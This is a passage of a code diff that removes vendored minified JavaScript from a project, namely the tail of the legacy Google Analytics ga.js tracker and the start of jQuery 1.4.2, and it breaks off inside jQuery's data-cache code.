-function(j){o.na=j;o.X()};o.pc=function(j,c,n,s){if(1!=s&&2!=s&&3!=s)s=3;var q=v;if(c&&n&&j>0&&j<=d.kb){c=P(c);n=P(n);if(c[y]+n[y]<=64){o.p[j]=[c,n,s];o.X();q=r}}return q};o.$b=function(j){if((j=o.p[j])&&1===j[2])return j[1]};o.Mb=function(j){var c=o.p;if(c[j]){delete c[j];o.X()}};o.Ib=function(){a._clearKey(8);a._clearKey(9);a._clearKey(11);var j=o.p,c,n;for(n in j)if(c=j[n]){a._setKey(8,n,c[0]);a._setKey(9,n,c[1]);(c=c[2])&&3!=c&&a._setKey(11,n,""+c)}}};var $=function(){function i(h,p,t,x){if(w==k[h])k[h]={};if(w==k[h][p])k[h][p]=[];k[h][p][t]=x}function f(h,p){if(w!=k[h]&&w!=k[h][p]){k[h][p]=w;var t=r,x;for(x=0;x<a[y];x++)if(w!=k[h][a[x]]){t=v;break}if(t)k[h]=w}}function m(h){var p="",t=v,x,E;for(x=0;x<a[y];x++){E=h[a[x]];if(w!=E){if(t)p+=a[x];p+=u(E);t=v}else t=r}return p}function u(h){var p=[],t,x;for(x=0;x<h[y];x++)if(w!=h[x]){t="";if(x!=e&&w==h[x-1])t+=x.toString()+s;t+=l(h[x]);S(p,t)}return j+p.join(n)+c}function l(h){var p="",t,x,E;for(t=
-0;t<h[y];t++){x=h.charAt(t);E=b[x];p+=w!=E?E:x}return p}var o=this,k={},g="k",d="v",a=[g,d],j="(",c=")",n="*",s="!",q="'",b={};b[q]="'0";b[c]="'1";b[n]="'2";b[s]="'3";var e=1;o.dc=function(h){return w!=k[h]};o.D=function(){var h="",p;for(p in k)if(w!=k[p])h+=p.toString()+m(k[p]);return h};o.nc=function(h){if(h==w)return o.D();var p=h.D(),t;for(t in k)if(w!=k[t]&&!h.dc(t))p+=t.toString()+m(k[t]);return p};o._setKey=function(h,p,t){if(typeof t!="string")return v;i(h,g,p,t);return r};o._setValue=function(h,
-p,t){if(typeof t!="number"&&(w==Number||!(t instanceof Number))||Math.round(t)!=t||t==NaN||t==Infinity)return v;i(h,d,p,t.toString());return r};o._getKey=function(h,p){return w!=k[h]&&w!=k[h][g]?k[h][g][p]:w};o._getValue=function(h,p){return w!=k[h]&&w!=k[h][d]?k[h][d][p]:w};o._clearKey=function(h){f(h,g)};o._clearValue=function(h){f(h,d)}};var za=function(i,f){var m=this;m.Fc=f;m.jc=i;m._trackEvent=function(u,l,o){return f._trackEvent(m.jc,u,l,o)}};var Aa=function(i,f,m){function u(){if("auto"==c.c){var b=c.a.domain;if("www."==N(b,0,4))b=N(b,4);c.c=b}c.c=U(c.c)}function l(){u();var b=c.c,e=b.indexOf("www.google.")*b.indexOf(".google.")*b.indexOf("google.");return e||"/"!=c.h||b.indexOf("google.org")>-1}function o(b,e,h){if(M(b)||M(e)||M(h))return"-";b=O(b,D+a.b+".",e);if(!M(b)){b=b.split(".");b[5]=b[5]?b[5]*1+1:1;b[3]=b[4];b[4]=h;b=b.join(".")}return b}function k(){return"file:"!=c.a[A].protocol&&l()}function g(b){if(!b||""==b)return"";for(;ia(b.charAt(0));)b=
-N(b,1);for(;ia(b.charAt(b[y]-1));)b=N(b,0,b[y]-1);return b}function d(b,e,h,p){if(!M(b())){e(p?Q(b()):b());R(b(),";")||h()}}var a=this,j=w,c=new sa,n=v,s=w;a.e=window;a.r=i;a.s=Math.round((new Date).getTime()/1E3);a.n=f||"UA-XXXXX-X";a.Ua=c.a.referrer;a.ca=w;a.f=w;a.M=w;a.C=v;a.A=w;a.g=w;a.Xa=w;a.b=w;a.i=w;c.o=m?P(m):w;var q=function(b){var e,h=""!=b&&c.a[A].host!=b;if(h)for(e=0;e<c.u[y];e++)h=h&&la(U(b),U(c.u[e]))==-1;return h};a.lc=function(){if(!a.M)return null;var b=a.M.match(/^(?:\|([-0-9a-z.]{1,30})(?::(\d{4,5}))?\|)?([-.\w]{10,1200})$/i);
-if(!b)return null;return{domain:b[1]||null,port:b[2]||null,token:b[3]}};a.Xb=function(){return W()^a.A.Qb()&2147483647};a.Ub=function(){if(!c.c||""==c.c||"none"==c.c){c.c="";return 1}u();return c.Ka?na(c.c):1};a.Pb=function(b,e){if(M(b))b="-";else{e+=c.h&&"/"!=c.h?c.h:"";var h=b.indexOf(e);b=h>=0&&h<=8?"0":"["==b.charAt(0)&&"]"==b.charAt(b[y]-1)?"-":b}return b};a.ra=function(b){var e="",h=c.a;e+=c.$?a.A.vc():"";e+=c.aa&&!M(h.title)?"&utmdt="+P(h.title):"";e+="&utmhid="+oa()+"&utmr="+P(a.ca)+"&utmp="+
-P(a.oc(b));return e};a.oc=function(b){var e=c.a[A];return b=w!=b&&""!=b?P(b,r):P(e.pathname+e.search,r)};a.yc=function(b){if(a.H()){var e="";if(a.g!=w&&a.g.D()[y]>0)e+="&utme="+P(a.g.D());e+=a.ra(b);j.F(e,a.n,a.b)}};a.Lb=function(){var b=new ua(c);return b.pa(a.b)?b.uc():w};a._getLinkerUrl=function(b,e){var h=b.split("#"),p=b,t=a.Lb();if(t)if(e&&1>=h[y])p+="#"+t;else if(!e||1>=h[y])if(1>=h[y])p+=(R(b,"?")?B:"?")+t;else p=h[0]+(R(b,"?")?B:"?")+t+"#"+h[1];return p};a.sc=function(){var b=a.lc();if(b){a.i.qc(a.M);
-a.i.Dc();X._gasoDomain=c.c;X._gasoCPath=c.h;var e="www.google.com";if(b.domain)e=b.domain+".google.com"+(b.port?":"+b.port:"");var h="https://www.google.com/analytics/reporting/overlay_js?gaso=";if(b.domain)h="https://"+e+"/analytics/reporting/overlay_js?gaso=";h+=b.token+B+W();pa(h,"_gasojs")}};a.cc=function(){var b=a.s,e=a.i,h=e.k(),p=a.b+"",t=c.e,x=t?t.gaGlobal:w,E,ja=R(h,D+p+"."),Ba=R(h,F+p),Ca=R(h,G+p),I,J=[],T="",qa=v;h=M(h)?"":h;if(c.z){E=c.a[A]&&c.a[A].hash?c.a[A].href.substring(c.a[A].href.indexOf("#")):
-"";if(c.Y&&!M(E))T=E+B;T+=c.a[A].search;if(!M(T)&&R(T,D)){e.mc(T);e.gb()||e.Kb();I=e.ea()}d(e.ha,e.sb,e.Cb,true);d(e.ga,e.va,e.za)}if(M(I))if(ja)if(!Ba||!Ca||0){I=o(h,";",b);a.C=r}else{I=O(h,D+p+".",";");J=V(O(h,F+p,";"),".")}else{I=ma([p,a.Xb(),b,b,b,1],".");qa=a.C=r}else if(M(e.B())||M(e.fa())){I=o(T,B,b);a.C=r}else{J=V(e.B(),".");p=J[0]}I=I.split(".");if(t&&x&&x.dh==p&&!c.o){I[4]=x.sid?x.sid:I[4];if(qa){I[3]=x.sid?x.sid:I[4];if(x.vid){b=x.vid.split(".");I[1]=b[0];I[2]=b[1]}}}e.qb(I.join("."));
-J[0]=p;J[1]=J[1]?J[1]:0;J[2]=w!=J[2]?J[2]:c.wc;J[3]=J[3]?J[3]:I[4];e.ta(J.join("."));e.rb(p);M(e.Zb())||e.ua(e.N());e.Ab();e.ya();e.Bb()};a.ec=function(){j=new wa(c)};a._getName=function(){return a.r};a._initData=function(){var b;if(!n){if(!a.A){a.A=new xa(c);a.A.Sb()}a.b=a.Ub();a.i=new ua(c);a.g=new $;s=new ya(c,a.b,a.i,a.g);a.ec()}if(k()){if(!n){a.ca=a.Pb(a.Ua,c.a.domain);b=new Z(a.b,a.ca,a.s,c)}a.cc(b);s.gc()}if(!n){k()&&b.getCampaignInformation(a.i,a.C);a.Xa=new $;n=r}a.fc()};a._visitCode=function(){a._initData();
-var b=O(a.i.k(),D+a.b+".",";");b=b.split(".");return b[y]<4?"":b[1]};a._cookiePathCopy=function(b){a._initData();a.i&&a.i.Bc(a.b,b)};a.fc=function(){if(!X.eb){var b=c.a[A].hash;if(b&&1==b.indexOf("gaso="))b=O(b,"gaso=",B);else b=(b=c.e.name)&&0<=b.indexOf("gaso=")?O(b,"gaso=",B):O(a.i.k(),ha,";");if(b[y]>=10){a.M=b;a.sc()}X.eb=r}};a.H=function(){return a._visitCode()%1E4<c.S*100};a.tc=function(){var b,e,h=c.a.links;if(!c.hb){b=c.a.domain;if("www."==N(b,0,4))b=N(b,4);c.u.push("."+b)}for(b=0;b<h[y]&&
-(c.ma==-1||b<c.ma);b++){e=h[b];if(q(e.host))if(!e.gatcOnclick){e.gatcOnclick=e.onclick?e.onclick:a.kc;e.onclick=function(p){var t=!this.target||this.target=="_self"||this.target=="_top"||this.target=="_parent";t=t&&!a.Jb(p);a.zc(p,this,t);return t?v:this.gatcOnclick?this.gatcOnclick(p):r}}}};a.kc=function(){};a._trackPageview=function(b){if(k()){a._initData();c.u&&a.tc();a.yc(b);a.C=v}};a._trackTrans=function(){var b=a.b,e=[],h,p,t;a._initData();if(a.f&&a.H()){for(h=0;h<a.f.W[y];h++){p=a.f.W[h];S(e,
-p.xa());for(t=0;t<p.P[y];t++)S(e,p.P[t].xa())}for(h=0;h<e[y];h++)j.F(e[h],a.n,b,r)}};a._setTrans=function(){var b=c.a,e,h,p;b=b.getElementById?b.getElementById("utmtrans"):b.utmform&&b.utmform.utmtrans?b.utmform.utmtrans:w;a._initData();if(b&&b.value){a.f=new Y;p=b.value.split("UTM:");c.v=!c.v||""==c.v?"|":c.v;for(b=0;b<p[y];b++){p[b]=g(p[b]);e=p[b].split(c.v);for(h=0;h<e[y];h++)e[h]=g(e[h]);if("T"==e[0])a._addTrans(e[1],e[2],e[3],e[4],e[5],e[6],e[7],e[8]);else"I"==e[0]&&a._addItem(e[1],e[2],e[3],
-e[4],e[5],e[6])}}};a._addTrans=function(b,e,h,p,t,x,E,ja){a.f=a.f?a.f:new Y;return a.f.Gb(b,e,h,p,t,x,E,ja)};a._addItem=function(b,e,h,p,t,x){var E;a.f=a.f?a.f:new Y;(E=a.f.db(b))||(E=a._addTrans(b,"","","","","","",""));E.Fb(e,h,p,t,x)};a._setVar=function(b){if(b&&""!=b&&l()){a._initData();s.rc(P(b));a.H()&&j.F("&utmt=var",a.n,a.b)}};a._setCustomVar=function(b,e,h,p){a._initData();return s.pc(b,e,h,p)};a._deleteCustomVar=function(b){a._initData();s.Mb(b)};a._getVisitorCustomVar=function(b){a._initData();
-return s.$b(b)};a._setMaxCustomVariables=function(b){c.kb=b};a._link=function(b,e){if(c.z&&b){a._initData();c.a[A].href=a._getLinkerUrl(b,e)}};a._linkByPost=function(b,e){if(c.z&&b&&b.action){a._initData();b.action=a._getLinkerUrl(b.action,e)}};a._setXKey=function(b,e,h){a.g._setKey(b,e,h)};a._setXValue=function(b,e,h){a.g._setValue(b,e,h)};a._getXKey=function(b,e){return a.g._getKey(b,e)};a._getXValue=function(b,e){return a.g.getValue(b,e)};a._clearXKey=function(b){a.g._clearKey(b)};a._clearXValue=
-function(b){a.g._clearValue(b)};a._createXObj=function(){a._initData();return new $};a._sendXEvent=function(b){var e="";a._initData();if(a.H()){e+="&utmt=event&utme="+P(a.g.nc(b))+a.ra();j.F(e,a.n,a.b,v,r)}};a._createEventTracker=function(b){a._initData();return new za(b,a)};a._trackEvent=function(b,e,h,p){a._initData();var t=a.Xa;if(w!=b&&w!=e&&""!=b&&""!=e){t._clearKey(5);t._clearValue(5);(b=t._setKey(5,1,b)&&t._setKey(5,2,e)&&(w==h||t._setKey(5,3,h))&&(w==p||t._setValue(5,1,p)))&&a._sendXEvent(t)}else b=
-v;return b};a.zc=function(b,e,h){a._initData();if(a.H()){var p=new $;p._setKey(6,1,e.href);var t=h?function(){a.Ya(b,e)}:w;j.F("&utmt=event&utme="+P(p.D())+a.ra(),a.n,a.b,v,r,t);h&&c.e.setTimeout(function(){a.Ya(b,e)},500)}};a.Ya=function(b,e){if(!b)b=c.e.event;var h=r;if(e.gatcOnclick)h=e.gatcOnclick(b);if(h||typeof h=="undefined")if(!e.target||e.target=="_self")c.e[A]=e.href;else if(e.target=="_top")c.e.top.document[A]=e.href;else if(e.target=="_parent")c.e.parent.document[A]=e.href};a.Jb=function(b){if(!b)b=
-c.e.event;var e=b.shiftKey||b.ctrlKey||b.altKey;if(!e)if(b.modifiers&&c.e.Event)e=b.modifiers&c.e.Event.CONTROL_MASK||b.modifiers&c.e.Event.SHIFT_MASK||b.modifiers&c.e.Event.ALT_MASK;return e};a.Ec=function(){return c};a._setDomainName=function(b){c.c=b};a._addOrganic=function(b,e,h){c.R.splice(h?0:c.R.length,0,new ra(b,e))};a._clearOrganic=function(){c.R=[]};a._addIgnoredOrganic=function(b){S(c.oa,b)};a._clearIgnoredOrganic=function(){c.oa=[]};a._addIgnoredRef=function(b){S(c.qa,b)};a._clearIgnoredRef=
-function(){c.qa=[]};a._setAllowHash=function(b){c.Ka=b?1:0};a._setCampaignTrack=function(b){c.Na=b?1:0};a._setClientInfo=function(b){c.$=b?1:0};a._getClientInfo=function(){return c.$};a._setCookiePath=function(b){c.h=b};a._setTransactionDelim=function(b){c.v=b};a._setCookieTimeout=function(b){a._setCampaignCookieTimeout(b*1E3)};a._setCampaignCookieTimeout=function(b){c.Ma=b};a._setDetectFlash=function(b){c.ba=b?1:0};a._getDetectFlash=function(){return c.ba};a._setDetectTitle=function(b){c.aa=b?1:
-0};a._getDetectTitle=function(){return c.aa};a._setLocalGifPath=function(b){c.ja=b};a._getLocalGifPath=function(){return c.ja};a._setLocalServerMode=function(){c.G=0};a._setRemoteServerMode=function(){c.G=1};a._setLocalRemoteServerMode=function(){c.G=2};a._getServiceMode=function(){return c.G};a._setSampleRate=function(b){c.S=b};a._setSessionTimeout=function(b){a._setSessionCookieTimeout(b*1E3)};a._setSessionCookieTimeout=function(b){c.pb=b};a._setAllowLinker=function(b){c.z=b?1:0};a._setAllowAnchor=
-function(b){c.Y=b?1:0};a._setCampNameKey=function(b){c.Ba=b};a._setCampContentKey=function(b){c.Ca=b};a._setCampIdKey=function(b){c.Da=b};a._setCampMediumKey=function(b){c.Ea=b};a._setCampNOKey=function(b){c.Fa=b};a._setCampSourceKey=function(b){c.Ga=b};a._setCampTermKey=function(b){c.Ha=b};a._setCampCIdKey=function(b){c.Ia=b};a._getAccount=function(){return a.n};a._setAccount=function(b){a.n=b};a._setNamespace=function(b){c.o=b?P(b):w};a._getVersion=function(){return da};a._setAutoTrackOutbound=
-function(b){c.u=[];if(b)c.u=b};a._setTrackOutboundSubdomains=function(b){c.hb=b};a._setHrefExamineLimit=function(b){c.ma=b};a._setReferrerOverride=function(b){a.Ua=b};a._setCookiePersistence=function(b){a._setVisitorCookieTimeout(b)};a._setVisitorCookieTimeout=function(b){c.w=b}};var Da=function(){var i=this;i.Va=v;i.yb={};i.Ac=0;i.eb=v;i._gasoDomain=w;i._gasoCPath=w;i._getTracker=function(f,m){return i._createTracker(f,w,m)};i._createTracker=function(f,m,u){if(m==w)m="~"+X.Ac++;return X.yb[m]=new Aa(m,f,u)};i._getTrackerByName=function(f){f=f||"";return X.yb[f]||X._createTracker(undefined,f)};i.Cc=function(){var f=window[ea];return f&&f[fa]&&f[fa]()};i._anonymizeIp=function(){i.Va=r}};var va=v,Fa=function(){var i=this;i._createAsyncTracker=function(f,m){return X._createTracker(f,m||"")};i._getAsyncTracker=function(f){return X._getTrackerByName(f)};i.push=function(){var f=arguments,m=0;va=r;for(var u=0;u<f[y];u++)try{if(typeof f[u]==="function")f[u]();else{var l="",o=f[u][0],k=o.lastIndexOf(".");if(k>0){l=N(o,0,k);o=N(o,k+1)}var g=l==aa?X:l==ba?Ea:X._getTrackerByName(l);g[o].apply(g,f[u].slice(1))}}catch(d){m++}return m}};function Ga(){var i=window[aa];if(i&&typeof i._getTracker=="function")X=i;else window[aa]=X}function Ha(){var i=window[ba],f=v;if(i&&typeof i.push=="function"){f=i.constructor==Array;if(!f)return}window[ba]=Ea;f&&Ea.push.apply(Ea,i)}var X=new Da;Ga();var Ea=new Fa;Ha();})()

src/commandcenter/files/jquery.js

@@ -1,154 +0,0 @@
-/*!
- * jQuery JavaScript Library v1.4.2
- * http://jquery.com/
- *
- * Copyright 2010, John Resig
- * Dual licensed under the MIT or GPL Version 2 licenses.
- * http://jquery.org/license
- *
- * Includes Sizzle.js
- * http://sizzlejs.com/
- * Copyright 2010, The Dojo Foundation
- * Released under the MIT, BSD, and GPL Licenses.
- *
- * Date: Sat Feb 13 22:33:48 2010 -0500
- */
-(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o],o,e(a[o],b)):d,j);return a}return i?
-e(a[0],b):w}function J(){return(new Date).getTime()}function Y(){return false}function Z(){return true}function na(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function oa(a){var b,d=[],f=[],e=arguments,j,i,o,k,n,r;i=c.data(this,"events");if(!(a.liveFired===this||!i||!i.live||a.button&&a.type==="click")){a.liveFired=this;var u=i.live.slice(0);for(k=0;k<u.length;k++){i=u[k];i.origType.replace(O,"")===a.type?f.push(i.selector):u.splice(k--,1)}j=c(a.target).closest(f,a.currentTarget);n=0;for(r=
-j.length;n<r;n++)for(k=0;k<u.length;k++){i=u[k];if(j[n].selector===i.selector){o=j[n].elem;f=null;if(i.preType==="mouseenter"||i.preType==="mouseleave")f=c(a.relatedTarget).closest(i.selector)[0];if(!f||f!==o)d.push({elem:o,handleObj:i})}}n=0;for(r=d.length;n<r;n++){j=d[n];a.currentTarget=j.elem;a.data=j.handleObj.data;a.handleObj=j.handleObj;if(j.handleObj.origHandler.apply(j.elem,e)===false){b=false;break}}return b}}function pa(a,b){return"live."+(a&&a!=="*"?a+".":"")+b.replace(/\./g,"`").replace(/ /g,
-"&")}function qa(a){return!a||!a.parentNode||a.parentNode.nodeType===11}function ra(a,b){var d=0;b.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var f=c.data(a[d++]),e=c.data(this,f);if(f=f&&f.events){delete e.handle;e.events={};for(var j in f)for(var i in f[j])c.event.add(this,j,f[j][i],f[j][i].data)}}})}function sa(a,b,d){var f,e,j;b=b&&b[0]?b[0].ownerDocument||b[0]:s;if(a.length===1&&typeof a[0]==="string"&&a[0].length<512&&b===s&&!ta.test(a[0])&&(c.support.checkClone||!ua.test(a[0]))){e=
-true;if(j=c.fragments[a[0]])if(j!==1)f=j}if(!f){f=b.createDocumentFragment();c.clean(a,b,f,d)}if(e)c.fragments[a[0]]=j?f:1;return{fragment:f,cacheable:e}}function K(a,b){var d={};c.each(va.concat.apply([],va.slice(0,b)),function(){d[this]=a});return d}function wa(a){return"scrollTo"in a&&a.document?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var c=function(a,b){return new c.fn.init(a,b)},Ra=A.jQuery,Sa=A.$,s=A.document,T,Ta=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,Ua=/^.[^:#\[\.,]*$/,Va=/\S/,
-Wa=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,Xa=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,P=navigator.userAgent,xa=false,Q=[],L,$=Object.prototype.toString,aa=Object.prototype.hasOwnProperty,ba=Array.prototype.push,R=Array.prototype.slice,ya=Array.prototype.indexOf;c.fn=c.prototype={init:function(a,b){var d,f;if(!a)return this;if(a.nodeType){this.context=this[0]=a;this.length=1;return this}if(a==="body"&&!b){this.context=s;this[0]=s.body;this.selector="body";this.length=1;return this}if(typeof a==="string")if((d=Ta.exec(a))&&
-(d[1]||!b))if(d[1]){f=b?b.ownerDocument||b:s;if(a=Xa.exec(a))if(c.isPlainObject(b)){a=[s.createElement(a[1])];c.fn.attr.call(a,b,true)}else a=[f.createElement(a[1])];else{a=sa([d[1]],[f]);a=(a.cacheable?a.fragment.cloneNode(true):a.fragment).childNodes}return c.merge(this,a)}else{if(b=s.getElementById(d[2])){if(b.id!==d[2])return T.find(a);this.length=1;this[0]=b}this.context=s;this.selector=a;return this}else if(!b&&/^\w+$/.test(a)){this.selector=a;this.context=s;a=s.getElementsByTagName(a);return c.merge(this,
-a)}else return!b||b.jquery?(b||T).find(a):c(b).find(a);else if(c.isFunction(a))return T.ready(a);if(a.selector!==w){this.selector=a.selector;this.context=a.context}return c.makeArray(a,this)},selector:"",jquery:"1.4.2",length:0,size:function(){return this.length},toArray:function(){return R.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this.slice(a)[0]:this[a]},pushStack:function(a,b,d){var f=c();c.isArray(a)?ba.apply(f,a):c.merge(f,a);f.prevObject=this;f.context=this.context;if(b===
-"find")f.selector=this.selector+(this.selector?" ":"")+d;else if(b)f.selector=this.selector+"."+b+"("+d+")";return f},each:function(a,b){return c.each(this,a,b)},ready:function(a){c.bindReady();if(c.isReady)a.call(s,c);else Q&&Q.push(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(R.apply(this,arguments),"slice",R.call(arguments).join(","))},map:function(a){return this.pushStack(c.map(this,
-function(b,d){return a.call(b,d,b)}))},end:function(){return this.prevObject||c(null)},push:ba,sort:[].sort,splice:[].splice};c.fn.init.prototype=c.fn;c.extend=c.fn.extend=function(){var a=arguments[0]||{},b=1,d=arguments.length,f=false,e,j,i,o;if(typeof a==="boolean"){f=a;a=arguments[1]||{};b=2}if(typeof a!=="object"&&!c.isFunction(a))a={};if(d===b){a=this;--b}for(;b<d;b++)if((e=arguments[b])!=null)for(j in e){i=a[j];o=e[j];if(a!==o)if(f&&o&&(c.isPlainObject(o)||c.isArray(o))){i=i&&(c.isPlainObject(i)||
-c.isArray(i))?i:c.isArray(o)?[]:{};a[j]=c.extend(f,i,o)}else if(o!==w)a[j]=o}return a};c.extend({noConflict:function(a){A.$=Sa;if(a)A.jQuery=Ra;return c},isReady:false,ready:function(){if(!c.isReady){if(!s.body)return setTimeout(c.ready,13);c.isReady=true;if(Q){for(var a,b=0;a=Q[b++];)a.call(s,c);Q=null}c.fn.triggerHandler&&c(s).triggerHandler("ready")}},bindReady:function(){if(!xa){xa=true;if(s.readyState==="complete")return c.ready();if(s.addEventListener){s.addEventListener("DOMContentLoaded",
-L,false);A.addEventListener("load",c.ready,false)}else if(s.attachEvent){s.attachEvent("onreadystatechange",L);A.attachEvent("onload",c.ready);var a=false;try{a=A.frameElement==null}catch(b){}s.documentElement.doScroll&&a&&ma()}}},isFunction:function(a){return $.call(a)==="[object Function]"},isArray:function(a){return $.call(a)==="[object Array]"},isPlainObject:function(a){if(!a||$.call(a)!=="[object Object]"||a.nodeType||a.setInterval)return false;if(a.constructor&&!aa.call(a,"constructor")&&!aa.call(a.constructor.prototype,
-"isPrototypeOf"))return false;var b;for(b in a);return b===w||aa.call(a,b)},isEmptyObject:function(a){for(var b in a)return false;return true},error:function(a){throw a;},parseJSON:function(a){if(typeof a!=="string"||!a)return null;a=c.trim(a);if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return A.JSON&&A.JSON.parse?A.JSON.parse(a):(new Function("return "+
-a))();else c.error("Invalid JSON: "+a)},noop:function(){},globalEval:function(a){if(a&&Va.test(a)){var b=s.getElementsByTagName("head")[0]||s.documentElement,d=s.createElement("script");d.type="text/javascript";if(c.support.scriptEval)d.appendChild(s.createTextNode(a));else d.text=a;b.insertBefore(d,b.firstChild);b.removeChild(d)}},nodeName:function(a,b){return a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,b,d){var f,e=0,j=a.length,i=j===w||c.isFunction(a);if(d)if(i)for(f in a){if(b.apply(a[f],
-d)===false)break}else for(;e<j;){if(b.apply(a[e++],d)===false)break}else if(i)for(f in a){if(b.call(a[f],f,a[f])===false)break}else for(d=a[0];e<j&&b.call(d,e,d)!==false;d=a[++e]);return a},trim:function(a){return(a||"").replace(Wa,"")},makeArray:function(a,b){b=b||[];if(a!=null)a.length==null||typeof a==="string"||c.isFunction(a)||typeof a!=="function"&&a.setInterval?ba.call(b,a):c.merge(b,a);return b},inArray:function(a,b){if(b.indexOf)return b.indexOf(a);for(var d=0,f=b.length;d<f;d++)if(b[d]===
-a)return d;return-1},merge:function(a,b){var d=a.length,f=0;if(typeof b.length==="number")for(var e=b.length;f<e;f++)a[d++]=b[f];else for(;b[f]!==w;)a[d++]=b[f++];a.length=d;return a},grep:function(a,b,d){for(var f=[],e=0,j=a.length;e<j;e++)!d!==!b(a[e],e)&&f.push(a[e]);return f},map:function(a,b,d){for(var f=[],e,j=0,i=a.length;j<i;j++){e=b(a[j],j,d);if(e!=null)f[f.length]=e}return f.concat.apply([],f)},guid:1,proxy:function(a,b,d){if(arguments.length===2)if(typeof b==="string"){d=a;a=d[b];b=w}else if(b&&
-!c.isFunction(b)){d=b;b=w}if(!b&&a)b=function(){return a.apply(d||this,arguments)};if(a)b.guid=a.guid=a.guid||b.guid||c.guid++;return b},uaMatch:function(a){a=a.toLowerCase();a=/(webkit)[ \/]([\w.]+)/.exec(a)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(a)||/(msie) ([\w.]+)/.exec(a)||!/compatible/.test(a)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(a)||[];return{browser:a[1]||"",version:a[2]||"0"}},browser:{}});P=c.uaMatch(P);if(P.browser){c.browser[P.browser]=true;c.browser.version=P.version}if(c.browser.webkit)c.browser.safari=
-true;if(ya)c.inArray=function(a,b){return ya.call(b,a)};T=c(s);if(s.addEventListener)L=function(){s.removeEventListener("DOMContentLoaded",L,false);c.ready()};else if(s.attachEvent)L=function(){if(s.readyState==="complete"){s.detachEvent("onreadystatechange",L);c.ready()}};(function(){c.support={};var a=s.documentElement,b=s.createElement("script"),d=s.createElement("div"),f="script"+J();d.style.display="none";d.innerHTML="   <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";
-var e=d.getElementsByTagName("*"),j=d.getElementsByTagName("a")[0];if(!(!e||!e.length||!j)){c.support={leadingWhitespace:d.firstChild.nodeType===3,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/red/.test(j.getAttribute("style")),hrefNormalized:j.getAttribute("href")==="/a",opacity:/^0.55$/.test(j.style.opacity),cssFloat:!!j.style.cssFloat,checkOn:d.getElementsByTagName("input")[0].value==="on",optSelected:s.createElement("select").appendChild(s.createElement("option")).selected,
-parentNode:d.removeChild(d.appendChild(s.createElement("div"))).parentNode===null,deleteExpando:true,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};b.type="text/javascript";try{b.appendChild(s.createTextNode("window."+f+"=1;"))}catch(i){}a.insertBefore(b,a.firstChild);if(A[f]){c.support.scriptEval=true;delete A[f]}try{delete b.test}catch(o){c.support.deleteExpando=false}a.removeChild(b);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function k(){c.support.noCloneEvent=
-false;d.detachEvent("onclick",k)});d.cloneNode(true).fireEvent("onclick")}d=s.createElement("div");d.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";a=s.createDocumentFragment();a.appendChild(d.firstChild);c.support.checkClone=a.cloneNode(true).cloneNode(true).lastChild.checked;c(function(){var k=s.createElement("div");k.style.width=k.style.paddingLeft="1px";s.body.appendChild(k);c.boxModel=c.support.boxModel=k.offsetWidth===2;s.body.removeChild(k).style.display="none"});a=function(k){var n=
-s.createElement("div");k="on"+k;var r=k in n;if(!r){n.setAttribute(k,"return;");r=typeof n[k]==="function"}return r};c.support.submitBubbles=a("submit");c.support.changeBubbles=a("change");a=b=d=e=j=null}})();c.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var G="jQuery"+J(),Ya=0,za={};c.extend({cache:{},expando:G,noData:{embed:true,object:true,
-applet:true},data:function(a,b,d){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==A?za:a;var f=a[G],e=c.cache;if(!f&&typeof b==="string"&&d===w)return null;f||(f=++Ya);if(typeof b==="object"){a[G]=f;e[f]=c.extend(true,{},b)}else if(!e[f]){a[G]=f;e[f]={}}a=e[f];if(d!==w)a[b]=d;return typeof b==="string"?a[b]:a}},removeData:function(a,b){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==A?za:a;var d=a[G],f=c.cache,e=f[d];if(b){if(e){delete e[b];c.isEmptyObject(e)&&c.removeData(a)}}else{if(c.support.deleteExpando)delete a[c.expando];
-else a.removeAttribute&&a.removeAttribute(c.expando);delete f[d]}}}});c.fn.extend({data:function(a,b){if(typeof a==="undefined"&&this.length)return c.data(this[0]);else if(typeof a==="object")return this.each(function(){c.data(this,a)});var d=a.split(".");d[1]=d[1]?"."+d[1]:"";if(b===w){var f=this.triggerHandler("getData"+d[1]+"!",[d[0]]);if(f===w&&this.length)f=c.data(this[0],a);return f===w&&d[1]?this.data(d[0]):f}else return this.trigger("setData"+d[1]+"!",[d[0],b]).each(function(){c.data(this,
